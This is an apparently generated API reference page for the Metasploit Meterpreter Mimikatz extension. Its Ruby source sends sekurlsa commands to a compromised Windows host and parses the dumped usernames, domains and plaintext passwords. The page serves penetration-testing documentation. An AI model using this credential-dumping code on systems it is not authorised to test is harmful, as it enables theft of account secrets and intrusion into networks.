class Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz
Mimikatz
extension - grabs credentials from Windows memory.
Benjamin DELPY `gentilkiwi` blog.gentilkiwi.com/mimikatz
extension converted by Ben Campbell (Meatballs)
Public Class Methods
new(client)
Calls superclass method
Rex::Post::Meterpreter::Extension::new
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 23
# Initializes the extension under the name 'mimikatz' and registers that
# name on the client as an alias pointing at this instance.
#
# @param client the client object this extension is attached to; it must
#   respond to register_extension_aliases
def initialize(client)
  super(client, 'mimikatz')

  # Single alias entry: extension name => this object.
  alias_entry = { 'name' => 'mimikatz', 'ext' => self }
  client.register_extension_aliases([alias_entry])
end
Public Instance Methods
kerberos()
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 120
# Issues the 'sekurlsa::kerberos' custom command and parses the textual
# reply with parse_creds_result.
#
# @return [Array<Hash>] one hash per parsed row; the :password field holds
#   whatever secret the reply contained, so keep the result out of logs
def kerberos
  parse_creds_result(send_custom_command('sekurlsa::kerberos'))
end
livessp()
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 105
# Issues the 'sekurlsa::livessp' custom command and parses the textual
# reply with parse_creds_result.
#
# @return [Array<Hash>] one hash per parsed row; the :password field holds
#   whatever secret the reply contained, so keep the result out of logs
def livessp
  parse_creds_result(send_custom_command('sekurlsa::livessp'))
end
msv()
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 100
# Issues the 'sekurlsa::msv' custom command and parses the textual reply
# with parse_creds_result.
#
# @return [Array<Hash>] one hash per parsed row; the :password field holds
#   whatever secret the reply contained, so keep the result out of logs
def msv
  parse_creds_result(send_custom_command('sekurlsa::msv'))
end
parse_creds_result(result)
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 49
# Converts CSV text into one hash per row, mapping the first five columns
# positionally to :authid, :package, :user, :domain and :password.
#
# Rows are not validated: a row with fewer than five columns yields nil for
# the missing keys, and columns beyond the fifth are ignored.
#
# @param result [String] CSV text to parse
# @return [Array<Hash>] one hash per CSV row, in input order; :password is
#   carried through verbatim, so treat the return value as sensitive
def parse_creds_result(result)
  field_names = [:authid, :package, :user, :domain, :password]

  # zip pads short rows with nil and drops surplus columns, which matches
  # plain positional indexing of the row.
  CSV.parse(result).map do |row|
    field_names.zip(row).to_h
  end
end
parse_ssp_result(result)
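# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 65
# Parses CSV text whose fifth column packs several "{ user ; domain ;
# password }" groups into one field, and returns one hash per group.
#
# Only rows with exactly five columns are considered. The fifth column is
# split on ' }' into groups, each group on ' ; ' into user/domain/password,
# and the user is the text following '{ ' in the first piece. Groups with
# no '{ ' marker are skipped.
#
# The input comes from a remote reply and is not trusted to be well formed:
# an empty fifth column (which CSV yields as nil) and empty groups are
# skipped instead of raising NoMethodError on nil.
#
# @param result [String] CSV text to parse
# @return [Array<Hash>] hashes with :authid, :package, :user, :domain,
#   :password, :orig_user and :orig_domain; :password is carried through
#   verbatim, so treat the return value as sensitive
def parse_ssp_result(result)
  accounts = []

  CSV.parse(result).each do |acc|
    next unless acc.length == 5

    # An unquoted empty CSV field parses to nil; to_s turns it into "no groups".
    acc[4].to_s.split(' }').each do |ssp|
      s_acc = ssp.split(' ; ')

      # An empty group splits to [], so s_acc[0] can be nil here.
      user = s_acc[0].to_s.split('{ ')[1]
      next unless user

      accounts << {
        :authid => acc[0],
        :package => acc[1],
        :user => user,
        :domain => s_acc[1],
        :password => s_acc[2],
        :orig_user => acc[2],
        :orig_domain => acc[3]
      }
    end
  end

  accounts
end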
send_custom_command(function, args=[])
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 45
# Runs send_custom_command_raw with the same arguments and passes the raw
# reply through Rex::Text.to_ascii.
#
# @param function [String] command name forwarded unchanged
# @param args [Array] arguments forwarded unchanged
# @return the value returned by Rex::Text.to_ascii for the raw reply
def send_custom_command(function, args=[])
  raw_reply = send_custom_command_raw(function, args)
  Rex::Text.to_ascii(raw_reply)
end
send_custom_command_raw(function, args=[])
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 35
# Builds a 'mimikatz_custom_command' request, attaches the function name
# and each argument as TLVs, sends it through the client and returns the
# result TLV from the response.
#
# The function name and arguments are placed in the request exactly as
# given; no validation or escaping happens here.
#
# @param function [String] value stored in TLV_TYPE_MIMIKATZ_FUNCTION
# @param args [Array] each element is added as its own
#   TLV_TYPE_MIMIKATZ_ARGUMENT entry, in order
# @return the value of TLV_TYPE_MIMIKATZ_RESULT from the response
def send_custom_command_raw(function, args=[])
  request = Packet.create_request('mimikatz_custom_command')
  request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
  args.each { |arg| request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, arg) }

  client.send_request(request).get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT)
end
ssp()
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 110
# Issues the 'sekurlsa::ssp' custom command and parses the textual reply
# with parse_ssp_result.
#
# @return [Array<Hash>] one hash per parsed group; the :password field holds
#   whatever secret the reply contained, so keep the result out of logs
def ssp
  parse_ssp_result(send_custom_command('sekurlsa::ssp'))
end
tspkg()
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 115
# Issues the 'sekurlsa::tspkg' custom command and parses the textual reply
# with parse_creds_result.
#
# @return [Array<Hash>] one hash per parsed row; the :password field holds
#   whatever secret the reply contained, so keep the result out of logs
def tspkg
  parse_creds_result(send_custom_command('sekurlsa::tspkg'))
end
wdigest()
# File lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb, line 95
# Issues the 'sekurlsa::wdigest' custom command and parses the textual
# reply with parse_creds_result.
#
# @return [Array<Hash>] one hash per parsed row; the :password field holds
#   whatever secret the reply contained, so keep the result out of logs
def wdigest
  parse_creds_result(send_custom_command('sekurlsa::wdigest'))
end